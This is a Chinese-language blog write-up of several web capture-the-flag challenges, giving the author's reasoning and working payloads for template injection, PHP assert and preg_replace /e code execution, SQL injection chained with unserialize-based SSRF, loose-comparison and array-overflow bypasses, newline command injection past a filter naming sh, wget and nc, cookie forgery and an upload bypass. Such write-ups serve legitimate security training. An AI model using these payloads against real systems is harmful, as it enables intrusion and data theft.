<h3 id="构造payload"><a href="#构造payload" class="headerlink" title="构造payload"></a>构造payload</h3><p>可以使用内置函数<code>get_flashed_messages()</code>，又因为config在current_app里面，所以我们可以构造payload</p>
<div class="hljs"><pre><code class="hljs clojure">&#123;&#123;get_flashed_messages.__globals__['current_app'].config['FLAG']&#125;&#125;</code></pre></div>



<h2 id="mfw"><a href="#mfw" class="headerlink" title="mfw"></a>mfw</h2><p>看到了git，可能存在git源码泄露</p>
<p><img src="https://i.loli.net/2020/12/02/M6zWQwdqsvRj1mD.png" srcset="/img/loading.gif" alt="git-1"></p>
<p>访问<a href="http://220.249.52.133:44852/.git/，确定存在源码泄露，使用githack下载源码，目录结构如图，templates下存在flag.php,它就是我们的目标。" target="_blank" rel="noopener">http://220.249.52.133:44852/.git/，确定存在源码泄露，使用githack下载源码，目录结构如图，templates下存在flag.php,它就是我们的目标。</a></p>
<p><img src="https://i.loli.net/2020/12/02/BXmiCHp5bocy7Tn.png" srcset="/img/loading.gif" alt="git-2"></p>
<h3 id="代码审计"><a href="#代码审计" class="headerlink" title="代码审计"></a>代码审计</h3><div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>

<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($_GET[<span class="hljs-string">'page'</span>])) &#123;
	$page = $_GET[<span class="hljs-string">'page'</span>];
&#125; <span class="hljs-keyword">else</span> &#123;
	$page = <span class="hljs-string">"home"</span>;
&#125;
$file = <span class="hljs-string">"templates/"</span> . $page . <span class="hljs-string">".php"</span>;

<span class="hljs-comment">// I heard '..' is dangerous!</span>
assert(<span class="hljs-string">"strpos('$file', '..') === false"</span>) <span class="hljs-keyword">or</span> <span class="hljs-keyword">die</span>(<span class="hljs-string">"Detected hacking attempt!"</span>);

<span class="hljs-comment">// <span class="hljs-doctag">TODO:</span> Make this look nice</span>
assert(<span class="hljs-string">"file_exists('$file')"</span>) <span class="hljs-keyword">or</span> <span class="hljs-keyword">die</span>(<span class="hljs-string">"That file doesn't exist!"</span>);

<span class="hljs-meta">?&gt;</span></code></pre></div>

<p><strong>file_exists</strong>函数</p>
<p><img src="https://i.loli.net/2020/12/02/VngSuP6h2W5xbHO.png" srcset="/img/loading.gif" alt="git-3">fil</p>
<p>输入</p>
<div class="hljs"><pre><code class="hljs routeros">?<span class="hljs-attribute">page</span>=flag</code></pre></div>

<p>页面显示为空，因为file_exists只能判断文件是否存在，无法返回文件内容，这就用利用cat读取内容了。因为没有对page做其他的过滤，我们可以利用assert + system，达到命令注入的目的。</p>
<p><strong>注意：</strong>assert函数会将传入的参数当作php代码执行</p>
<p>构造payload，这里就像sql注入的语句，闭合前面的语句并填写自己想要的语句</p>
<div class="hljs"><pre><code class="hljs perl">先测试一下想法对不对
//?page=<span class="hljs-string">') or phpinfo();#</span>
<span class="hljs-string">//assert("file_exists('</span>$file<span class="hljs-string">') or phpinfo();)#</span>
<span class="hljs-string">?page='</span>)%20or%20phpinfo()%3B%23
显示出了phpinfo(),所以思路是对的
继续构造
//?page=<span class="hljs-string">') or system("cat templates/flag.php"); #</span>
<span class="hljs-string">最后的payload</span>
<span class="hljs-string"></span>
<span class="hljs-string">?page='</span>)%20or%20system(%22cat%20templates%2Fflag.php%22)%3B%23</code></pre></div>

<p><img src="https://i.loli.net/2020/12/02/Z9L2rxqjBgMyViv.png" srcset="/img/loading.gif" alt="git-4"></p>
<p><img src="https://i.loli.net/2020/12/02/U4TOzpaGBhHKlIV.png" srcset="/img/loading.gif" alt="git-5"></p>
<h2 id="fakebook"><a href="#fakebook" class="headerlink" title="fakebook"></a>fakebook</h2><h3 id="0x1-sql注入"><a href="#0x1-sql注入" class="headerlink" title="0x1 sql注入"></a>0x1 sql注入</h3><p>进入网页发现是一个博客页面，先随便注册一个账号登录上去看看，发现了一个貌似可以注入的地方</p>
<p><code>http://220.249.52.133:44224/view.php?no=1</code>参数no这里应该是一个数字型的注入点，测试一下。</p>
<p><code>http://220.249.52.133:44224/view.php?no=1 and 1=1</code>显示是正常的，但是</p>
<p><code>http://220.249.52.133:44224/view.php?no=1 and 1=2</code>网页报错，确定了就是数字型注入</p>
<p>接下来继续注入的常规操作。</p>
<p><code>http://220.249.52.133:44224/view.php?no=-2 order by 4#</code>时页面显示正常，并提示了网站的根目录</p>
<p><img src="https://i.loli.net/2020/11/30/oIDBgmVNszZ3raw.png" srcset="/img/loading.gif" alt></p>
<p>但是当 order by 5 # 时，网页报错，确定是四列。</p>
<p><strong>爆表名</strong></p>
<p>本以为会顺利的爆破出来，但是提示了 hacker ，这里可能存在黑名单检测</p>
<p>试了试双写绕过，发现继续提示hack，再试试用/**/替换空格，这次居然可以了，暂且当它是禁了空格。这里还出现一个提示</p>
<div class="hljs"><pre><code class="hljs livecodeserver">Notice: unserialize(): Error <span class="hljs-keyword">at</span> <span class="hljs-built_in">offset</span> <span class="hljs-number">0</span> <span class="hljs-keyword">of</span> <span class="hljs-number">1</span> <span class="hljs-keyword">bytes</span> <span class="hljs-keyword">in</span> /var/www/html/view.php <span class="hljs-keyword">on</span> <span class="hljs-title">line</span> <span class="hljs-title">31</span>

提示存在反序列化，但是不知道怎么用继续爆表。</code></pre></div>

<p><img src="https://i.loli.net/2020/11/30/RT5xSpfQ4XJakrF.png" srcset="/img/loading.gif" alt></p>
<div class="hljs"><pre><code class="hljs pgsql">?<span class="hljs-keyword">no</span>=<span class="hljs-number">-2</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">union</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">select</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span>,(<span class="hljs-keyword">select</span> group_concat(<span class="hljs-built_in">TABLE_NAME</span>) <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">TABLES</span> <span class="hljs-keyword">where</span> TABLE_SCHEMA=<span class="hljs-keyword">database</span>()),<span class="hljs-number">3</span>,<span class="hljs-number">4</span>#

?<span class="hljs-keyword">no</span>=<span class="hljs-number">-2</span> <span class="hljs-keyword">union</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,group_concat(<span class="hljs-built_in">column_name</span>),<span class="hljs-number">3</span>,<span class="hljs-number">4</span> <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">columns</span> <span class="hljs-keyword">where</span> <span class="hljs-built_in">table_name</span>=<span class="hljs-string">'users'</span>#

/<span class="hljs-comment">/**no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS**</span></code></pre></div>

<p>爆出一大堆列名。直接读取data的内容</p>
<div class="hljs"><pre><code class="hljs crystal">?no=-<span class="hljs-number">2</span> <span class="hljs-class"><span class="hljs-keyword">union</span>/**/<span class="hljs-title">select</span> 1,(<span class="hljs-title">select</span> <span class="hljs-title">data</span> <span class="hljs-title">from</span> <span class="hljs-title">users</span>),3,4 <span class="hljs-comment">#</span></span></code></pre></div>

<p>发现内容是注册时信息保存为序列化内容</p>
<div class="hljs"><pre><code class="hljs css"><span class="hljs-selector-tag">O</span><span class="hljs-selector-pseudo">:8</span><span class="hljs-selector-pseudo">:"UserInfo"</span><span class="hljs-selector-pseudo">:3</span>:&#123;<span class="hljs-attribute">s</span>:<span class="hljs-number">4</span>:<span class="hljs-string">"name"</span>;<span class="hljs-attribute">s</span>:<span class="hljs-number">5</span>:<span class="hljs-string">"sunzy"</span>;<span class="hljs-attribute">s</span>:<span class="hljs-number">3</span>:<span class="hljs-string">"age"</span>;<span class="hljs-attribute">i</span>:<span class="hljs-number">22</span>;<span class="hljs-attribute">s</span>:<span class="hljs-number">4</span>:<span class="hljs-string">"blog"</span>;<span class="hljs-attribute">s</span>:<span class="hljs-number">12</span>:<span class="hljs-string">"22.github.io"</span>;&#125;</code></pre></div>

<p>到这里就不知道怎么办了。。。</p>
<p><strong>做到这里我们大致知道了下面的信息：</strong></p>
<blockquote>
<p>view.php进行了对某个数据进行反序列化(unserializa)操作，从上面跑出的data分析是对data进行了 反序列化操作,在上一步骤中我们得到了user表有4列分别为no，passwd，data，username，并没有 单独存放blog列，所以blog显示应该是从data列取出再进行反序列化</p>
</blockquote>
<h3 id="0x02代码审计"><a href="#0x02代码审计" class="headerlink" title="0x02代码审计"></a>0x02代码审计</h3><p>扫描一下目录发现了robots.txt，其中给出来了源码备份文件的路径</p>
<p><img src="https://i.loli.net/2020/11/30/inMDXtwCpoTqgrc.png" srcset="/img/loading.gif" alt></p>
<p>源码</p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">UserInfo</span>   //<span class="hljs-title">user</span>信息类</span>
<span class="hljs-class"></span>&#123;
    <span class="hljs-keyword">public</span> $name = <span class="hljs-string">""</span>;
    <span class="hljs-keyword">public</span> $age = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">public</span> $blog = <span class="hljs-string">""</span>;
<span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">($name, $age, $blog)</span></span>
<span class="hljs-function"></span>&#123;
    <span class="hljs-keyword">$this</span>-&gt;name = $name;
    <span class="hljs-keyword">$this</span>-&gt;age = (int)$age;
    <span class="hljs-keyword">$this</span>-&gt;blog = $blog;
&#125;

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">get</span><span class="hljs-params">($url)</span> // 处理<span class="hljs-title">url</span></span>
<span class="hljs-function"></span>&#123;  
    $ch = curl_init();   <span class="hljs-comment">//初始化一个curl会话</span>

    curl_setopt($ch, CURLOPT_URL, $url);   <span class="hljs-comment">//设置url和相应的参数</span>
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, <span class="hljs-number">1</span>);
    $output = curl_exec($ch);         	   <span class="hljs-comment">// 执行这个cURL会话</span>
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);  <span class="hljs-comment">//获取状态码</span>
    <span class="hljs-keyword">if</span>($httpCode == <span class="hljs-number">404</span>) &#123;
        <span class="hljs-keyword">return</span> <span class="hljs-number">404</span>;
    &#125;
    curl_close($ch);

    <span class="hljs-keyword">return</span> $output;
&#125;

<span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getBlogContents</span> <span class="hljs-params">()</span></span>
<span class="hljs-function"></span>&#123;
    <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;get(<span class="hljs-keyword">$this</span>-&gt;blog);
&#125;

<span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">isValidBlog</span> <span class="hljs-params">()</span> //这是注册账号时检测<span class="hljs-title">blog</span>是否合法</span>
<span class="hljs-function"></span>&#123;
    $blog = <span class="hljs-keyword">$this</span>-&gt;blog;
    <span class="hljs-keyword">return</span> preg_match(<span class="hljs-string">"/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]&#123;2,6&#125;(\:[0-9]+)?(\/\S*)?$/i"</span>, $blog);
&#125;
&#125;</code></pre></div>

<p>审计源码发现其中get()函数存在SSRF(服务端请求伪造)漏洞。</p>
<div class="hljs"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">get</span><span class="hljs-params">(<span class="hljs-variable">$url</span>)</span></span> 
<span class="hljs-function"><span class="hljs-title">get</span><span class="hljs-params">(<span class="hljs-variable">$this</span>-&gt;blog)</span></span></code></pre></div>

<p>这里get中的参数取自blog，所以我们可以利用反序列化构造出一个ssrf，将blog位置修改为我们想要访问的位置，结合上面的提示就构造出下面的payload：</p>
<div class="hljs"><pre><code class="hljs groovy">?no=-2%20union/**/select%201,2,3,'O:<span class="hljs-number">8</span>:<span class="hljs-string">"UserInfo"</span>:<span class="hljs-number">3</span>:&#123;<span class="hljs-string">s:</span><span class="hljs-number">4</span>:<span class="hljs-string">"name"</span>;<span class="hljs-string">s:</span><span class="hljs-number">5</span>:<span class="hljs-string">"sunzy"</span>;<span class="hljs-string">s:</span><span class="hljs-number">3</span>:<span class="hljs-string">"age"</span>;<span class="hljs-string">i:</span><span class="hljs-number">22</span>;<span class="hljs-string">s:</span><span class="hljs-number">4</span>:<span class="hljs-string">"blog"</span>;<span class="hljs-string">s:</span><span class="hljs-number">29</span>:<span class="hljs-string">"file:///var/www/html/flag.php"</span>;&#125;<span class="hljs-string">'%20#</span></code></pre></div>

<p>查看源码，解base64。</p>
<p><strong>思路：利用no参数进行注入，在反序列化中构造file文件协议，利用服务端请求伪造漏洞访问服务器上的flag.php文件。</strong></p>
<h2 id="ics-05"><a href="#ics-05" class="headerlink" title="ics-05"></a>ics-05</h2><p>进入页面只有一个是有用的，进入设备维护中心</p>
<p><img src="https://i.loli.net/2020/12/02/Qje1Yih9dwH3xnm.png" srcset="/img/loading.gif" alt="image-20201202170901536"></p>
<p>先点击云平台设备维护中心，url会发生改变出现page参数，这一看就是典型的读取源码</p>
<p>构造payload:</p>
<div class="hljs"><pre><code class="hljs awk">?page=php:<span class="hljs-regexp">//</span>filter<span class="hljs-regexp">/convert.base64-encode/</span>resource=index.php</code></pre></div>

<p>源码中的php代码</p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
$page = $_GET[page];
<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($page)) &#123;
<span class="hljs-keyword">if</span> (ctype_alnum($page)) &#123;
<span class="hljs-meta">?&gt;</span>
    &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;
    &lt;div style=<span class="hljs-string">"text-align:center"</span>&gt;
        &lt;p class="lead"&gt;&lt;?php echo $page; die();?&gt;&lt;/p&gt;
    &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;
<span class="hljs-meta">&lt;?php</span>
&#125;<span class="hljs-keyword">else</span>&#123;
<span class="hljs-meta">?&gt;</span>
        &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;
        &lt;div style=<span class="hljs-string">"text-align:center"</span>&gt;
            &lt;p class="lead"&gt;
                <span class="hljs-meta">&lt;?php</span>
                <span class="hljs-keyword">if</span> (strpos($page, <span class="hljs-string">'input'</span>) &gt; <span class="hljs-number">0</span>) &#123;   <span class="hljs-comment">//这里是对几个关键词的过滤，我们读取源码时没有用到这几个关键词所以没有影响</span>
                    <span class="hljs-keyword">die</span>();
                &#125;

                <span class="hljs-keyword">if</span> (strpos($page, <span class="hljs-string">'ta:text'</span>) &gt; <span class="hljs-number">0</span>) &#123;
                    <span class="hljs-keyword">die</span>();
                &#125;

                <span class="hljs-keyword">if</span> (strpos($page, <span class="hljs-string">'text'</span>) &gt; <span class="hljs-number">0</span>) &#123;
                    <span class="hljs-keyword">die</span>();
                &#125;

                <span class="hljs-keyword">if</span> ($page === <span class="hljs-string">'index.php'</span>) &#123;
                    <span class="hljs-keyword">die</span>(<span class="hljs-string">'Ok'</span>);
                &#125;
                    <span class="hljs-keyword">include</span>($page);
                    <span class="hljs-keyword">die</span>();
                <span class="hljs-meta">?&gt;</span>
        &lt;/p&gt;
        &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;
<span class="hljs-meta">&lt;?php</span>
&#125;&#125;
<span class="hljs-comment">//方便的实现输入输出的功能,正在开发中的功能，只能内部人员测试</span>

<span class="hljs-keyword">if</span> ($_SERVER[<span class="hljs-string">'HTTP_X_FORWARDED_FOR'</span>] === <span class="hljs-string">'127.0.0.1'</span>) &#123; <span class="hljs-comment">//xxf头</span>

    <span class="hljs-keyword">echo</span> <span class="hljs-string">"&lt;br &gt;Welcome My Admin ! &lt;br &gt;"</span>;   
   
    $pattern = $_GET[pat];  <span class="hljs-comment">//get 提交三个参数</span>
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($pattern) &amp;&amp; <span class="hljs-keyword">isset</span>($replacement) &amp;&amp; <span class="hljs-keyword">isset</span>($subject)) &#123;
        preg_replace($pattern, $replacement, $subject);
    &#125;<span class="hljs-keyword">else</span>&#123;
        <span class="hljs-keyword">die</span>();
    &#125;
&#125;
<span class="hljs-meta">?&gt;</span></code></pre></div>

<p>前面代码没有突破点，直到看到<code>preg_replace</code></p>
<p><img src="https://i.loli.net/2020/12/02/4FfYrPBc1xE9Kzk.png" srcset="/img/loading.gif" alt="preg_replace"></p>
<p>漏洞</p>
<p>$pattern 存在 /e 模式修正符，允许代码执行</p>
<p>/e 模式修正符，是 *<em>preg_replace() *</em> 导致 $replacement 部分当做php代码来执行。</p>
<p>所以可以构造如下</p>
<p>payload</p>
<div class="hljs"><pre><code class="hljs sas">?pat=/test/e<span class="hljs-variable">&amp;rep</span><span class="hljs-meta">=system(</span><span class="hljs-string">'ls'</span>)<span class="hljs-variable">&amp;sub</span>=test
?pat=/test/e<span class="hljs-variable">&amp;rep</span><span class="hljs-meta">=system(</span><span class="hljs-string">'ls s3chahahaDir/'</span>)<span class="hljs-variable">&amp;sub</span>=test
?pat=/test/e<span class="hljs-variable">&amp;rep</span><span class="hljs-meta">=system(</span><span class="hljs-string">'ls s3chahahaDir/flag'</span>)<span class="hljs-variable">&amp;sub</span>=test
?pat=/test/e<span class="hljs-variable">&amp;rep</span><span class="hljs-meta">=system(</span><span class="hljs-string">'cat s3chahahaDir/flag/flag.php'</span>)<span class="hljs-variable">&amp;sub</span>=test</code></pre></div>

<p>参考:<a href="https://kevens10.github.io/articles/preg_replace()%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html" target="_blank" rel="noopener">https://kevens10.github.io/articles/preg_replace()%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html</a> </p>
<h2 id="lottery"><a href="#lottery" class="headerlink" title="lottery"></a>lottery</h2><h3 id="0x1注册玩一下"><a href="#0x1注册玩一下" class="headerlink" title="0x1注册玩一下"></a>0x1注册玩一下</h3><p>​        进入页面发下是一个买彩票的，先注册一个账号，初始有20块钱，要买flag，需要99999999，显然不可能</p>
<p>还有一个买彩票的地方，每次花2块钱两个号码对了奖励五块，这些都不重要。</p>
<p><img src="https://i.loli.net/2020/12/02/f2TOhKdw1Bo9QY6.png" srcset="/img/loading.gif" alt="image-20201202220622597"></p>
<p>开始是想着通过脚本多买几次，后来发现不对啊，每次都是买完了之后中将号码才公布出来，脚本就没意义了，所以这个想法断了。</p>
<p>于是去看看了别的</p>
<h3 id="0x2-git源码泄露"><a href="#0x2-git源码泄露" class="headerlink" title="0x2 git源码泄露"></a>0x2 git源码泄露</h3><p>​        下载了好几个文件，看看了其中有用的只有<code>api.php</code>，代码太长了，复制了重要的部分</p>
<p>审计代码</p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-comment">//随机生成中将号码</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">random_win_nums</span><span class="hljs-params">()</span></span>&#123;
	$result = <span class="hljs-string">''</span>;
	<span class="hljs-keyword">for</span>($i=<span class="hljs-number">0</span>; $i&lt;<span class="hljs-number">7</span>; $i++)&#123;
		$result .= random_num();  <span class="hljs-comment">//利用自定义的随机函数生成随机数</span>
	&#125;
	<span class="hljs-keyword">return</span> $result;
&#125;
<span class="hljs-comment">//检测是否中奖以及 奖励和扣费规则</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">buy</span><span class="hljs-params">($req)</span></span>&#123;
	require_registered();  <span class="hljs-comment">//检测是否注册</span>
	require_min_money(<span class="hljs-number">2</span>);  <span class="hljs-comment">//是否有2块钱买彩票</span>

	$money = $_SESSION[<span class="hljs-string">'money'</span>];  <span class="hljs-comment">//用户的钱 </span>
	$numbers = $req[<span class="hljs-string">'numbers'</span>];   <span class="hljs-comment">//用户买的彩票号码</span>
	$win_numbers = random_win_nums();  <span class="hljs-comment">//中奖号码</span>
	$same_count = <span class="hljs-number">0</span>;              <span class="hljs-comment">//记录有几位中奖</span>
	<span class="hljs-keyword">for</span>($i=<span class="hljs-number">0</span>; $i&lt;<span class="hljs-number">7</span>; $i++)&#123;		   <span class="hljs-comment">// 判断有几位中奖</span>
		<span class="hljs-keyword">if</span>($numbers[$i] == $win_numbers[$i])&#123;  <span class="hljs-comment">//重点来了</span>
			$same_count++;
		&#125;
	&#125;
    	<span class="hljs-keyword">switch</span> ($same_count) &#123;
		<span class="hljs-comment">//pass</span>
	&#125;
	$money += $prize - <span class="hljs-number">2</span>;
	$_SESSION[<span class="hljs-string">'money'</span>] = $money;
	response([<span class="hljs-string">'status'</span>=&gt;<span class="hljs-string">'ok'</span>,<span class="hljs-string">'numbers'</span>=&gt;$numbers, <span class="hljs-string">'win_numbers'</span>=&gt;$win_numbers, <span class="hljs-string">'money'</span>=&gt;$money, <span class="hljs-string">'prize'</span>=&gt;$prize]);
&#125;</code></pre></div>



<p>上面的代码看着像是没什么问题，但是对<code>==</code>敏感的一眼就会发现这里存在问题</p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-keyword">for</span>($i=<span class="hljs-number">0</span>; $i&lt;<span class="hljs-number">7</span>; $i++)&#123;		   <span class="hljs-comment">// 判断有几位中奖</span>
		<span class="hljs-keyword">if</span>($numbers[$i] == $win_numbers[$i])&#123;  <span class="hljs-comment">//重点来了</span>
			$same_count++;
		&#125;
	&#125;</code></pre></div>

<p>这里判断是否相等居然用 <code>==</code>，就很离谱，也是突破点，测试效果如下 </p>
<p><img src="https://i.loli.net/2020/12/02/EpgPnUsz1FBfq9k.png" srcset="/img/loading.gif" alt="caipiao-1"></p>
<p>所以思路就是，抓包修改我们输入的号码都为True，就行了，一次中奖不够就多买几次</p>
<p><strong>注意这里上传数据时使用的是json格式</strong>，<a href="https://www.runoob.com/json/js-json-arrays.html" target="_blank" rel="noopener">json数组类型</a></p>
<p><img src="https://i.loli.net/2020/12/02/qwTPDFZXuaSitR9.png" srcset="/img/loading.gif" alt="image-20201202221043572"></p>
<p>之后返回浏览器买flag即可</p>
<h2 id="favorite-number"><a href="#favorite-number" class="headerlink" title="favorite_number"></a>favorite_number</h2><div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-comment">//php5.5.9</span>
$stuff = $_POST[<span class="hljs-string">"stuff"</span>];
$array = [<span class="hljs-string">'admin'</span>, <span class="hljs-string">'user'</span>];
<span class="hljs-keyword">if</span>($stuff === $array &amp;&amp; $stuff[<span class="hljs-number">0</span>] != <span class="hljs-string">'admin'</span>) &#123;
    $num= $_POST[<span class="hljs-string">"num"</span>];
    <span class="hljs-keyword">if</span> (preg_match(<span class="hljs-string">"/^\d+$/im"</span>,$num))&#123;
        <span class="hljs-keyword">if</span> (!preg_match(<span class="hljs-string">"/sh|wget|nc|python|php|perl|\?|flag|&#125;|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i"</span>,$num))&#123;
            <span class="hljs-keyword">echo</span> <span class="hljs-string">"my favorite num is:"</span>;
            system(<span class="hljs-string">"echo "</span>.$num);
        &#125;<span class="hljs-keyword">else</span>&#123;
            <span class="hljs-keyword">echo</span> <span class="hljs-string">'Bonjour!'</span>;
        &#125;
    &#125;
&#125; <span class="hljs-keyword">else</span> &#123;
    highlight_file(<span class="hljs-keyword">__FILE__</span>);
&#125;</code></pre></div>



<h3 id="0x1代码审计"><a href="#0x1代码审计" class="headerlink" title="0x1代码审计"></a>0x1代码审计</h3><p>代码意思</p>
<blockquote>
<p>输入一个数组stuff,stuff要和array相同，但是$stuff[0] != ‘admin’</p>
<p>这是一个矛盾的判断，所以要想办法绕过</p>
<p>下面是提交一个数字，通过判断后打印出这个数字并执行system函数</p>
<p>这里一定存在命令执行</p>
</blockquote>
<p>题目直接给了源码，并且表明了php版本为5.5.9，那就说明这个题目一定和这个版本的漏洞有关，google一下</p>
<p><a href="https://segmentfault.com/q/1010000003871264，这是与这题很像的一题" target="_blank" rel="noopener">https://segmentfault.com/q/1010000003871264，这是与这题很像的一题</a></p>
<p>php5.5.9的数组的key溢出漏洞</p>
<p>结合上面的题目构造出payload:</p>
<div class="hljs"><pre><code class="hljs angelscript">stuff[<span class="hljs-number">4294967296</span>]=admin&amp;stuff[<span class="hljs-number">1</span>]=user&amp;num=<span class="hljs-number">123</span></code></pre></div>

<p>页面成功打印出了<code>my favorite num is:123</code>,说明前面已经绕过成功了</p>
<h3 id="0x2-绕过数字，命令注入"><a href="#0x2-绕过数字，命令注入" class="headerlink" title="0x2 绕过数字，命令注入"></a>0x2 绕过数字，命令注入</h3><p>因为正则表达式最后的m允许多行匹配，所以这里可以使用%0a绕过数字检测</p>
<p>开始构造出的</p>
<div class="hljs"><pre><code class="hljs angelscript">stuff[<span class="hljs-number">4294967296</span>]=admin&amp;stuff[<span class="hljs-number">1</span>]=user&amp;num=<span class="hljs-number">123</span>%<span class="hljs-number">0</span>als /</code></pre></div>

<p>成功列出了目录，看到了flag，但是读取的时候发现flag关键被过滤了</p>
<p>所以不得不换一种方法</p>
<div class="hljs"><pre><code class="hljs routeros">ls -i
<span class="hljs-comment"># 列出当前⽂件列表，取出inode</span>

<span class="hljs-comment"># find找到对应inode的⽂件</span>
<span class="hljs-builtin-name">find</span> / -inum

<span class="hljs-comment"># more读取对应的文件</span>
more `<span class="hljs-builtin-name">find</span> / -inum `</code></pre></div>



<p><img src="https://i.loli.net/2020/12/03/84FbyGXJTK157LA.png" srcset="/img/loading.gif" alt="find"></p>
<p>所以最后的payload:</p>
<div class="hljs"><pre><code class="hljs angelscript">stuff[<span class="hljs-number">4294967296</span>]=admin&amp;stuff[<span class="hljs-number">1</span>]=user&amp;num=<span class="hljs-number">111</span>%<span class="hljs-number">0</span>amore `find / -inum <span class="hljs-number">38667190</span>`</code></pre></div>



<p><img src="https://i.loli.net/2020/12/03/cesVHi2EJPogUq9.png" srcset="/img/loading.gif" alt="more"></p>
<p>参考：</p>
<blockquote>
<p><a href="https://www.coodesker.com/" target="_blank" rel="noopener">https://www.coodesker.com/</a></p>
<p><a href="https://blog.csdn.net/weixin_44604541/article/details/109365511" target="_blank" rel="noopener">https://blog.csdn.net/weixin_44604541/article/details/109365511</a></p>
</blockquote>
<h2 id="bug"><a href="#bug" class="headerlink" title="bug"></a>bug</h2><h3 id="0x1获得admin权限"><a href="#0x1获得admin权限" class="headerlink" title="0x1获得admin权限"></a>0x1获得admin权限</h3><p>先注册登录看看，页面功能很简单，当点击manage时，提示需要admin账号才可以，所以接下来就要想办法拿到admin账号</p>
<p>在注册的时候有一个找回密码的功能，当我们点进去的时候可以看到，修改密码只需要生日和地址</p>
<p><img src="https://i.loli.net/2020/12/04/gMlj3mK1dIGViZS.png" srcset="/img/loading.gif" alt="image-20201204130616230"></p>
<p>这就想到了刚才登录页面显示的个人信息，那么怎么才能拿到admin的个人信息就是一个问题</p>
<p>不妨先抓包看一下，可以看到cookie中有一个user，这个值像是md5，在线解密一下</p>
<p><img src="https://i.loli.net/2020/12/04/Mok5CT4UrhnfQRE.png" srcset="/img/loading.gif" alt="image-20201204125903267"></p>
<div class="hljs"><pre><code class="hljs angelscript"><span class="hljs-number">82</span>ed7a14920dd2db1b6657348656eaa5
<span class="hljs-number">7</span>:<span class="hljs-number">123</span></code></pre></div>

<p>也就是uid+username的md5值，那我们是不是可以伪造一个这样的cookie然后到个人信息的页面提交获取信息</p>
<div class="hljs"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">md5</span><span class="hljs-params">(<span class="hljs-number">1</span>:amdin)</span></span>=<span class="hljs-number">4</span>b9987ccafacb8d8fc08d22bbca797ba</code></pre></div>

<p><img src="https://i.loli.net/2020/12/04/hmOfpoeK4s2jyvZ.png" srcset="/img/loading.gif" alt="bug-1"></p>
<p>这样就获取了信息，再去修改密码登录</p>
<h3 id="0x2上传绕过"><a href="#0x2上传绕过" class="headerlink" title="0x2上传绕过"></a>0x2上传绕过</h3><p>登录后点击manage提示非法IP，直接抓包添加xxf，得到提示</p>
<div class="hljs"><pre><code class="hljs xml"><span class="hljs-comment">&lt;!-- index.php?module=filemanage&amp;do=???--&gt;</span></code></pre></div>

<p>访问一下上面的地址一开始以为do是submit，但是提交没反应，又改成了upload，这样就对了，出来一个上传图片的网页</p>
<p>上传php文件，出现前端检测提示</p>
<p>那就直接抓包，把php改成php5修改了MIME为image/jpeg，但是还是提示可以看出来是一个php文件，可能检测了文件开头信息，那就改成下面格式的一句话木马</p>
<p>获得了flag</p>
<p><img src="https://i.loli.net/2020/12/04/Nos2ZmYglFMIcLx.png" srcset="/img/loading.gif" alt="image-20201204132940298"></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/ctf/">ctf</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">文件包含</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/11/29/rcm/">
                        <span class="hidden-mobile">rce</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
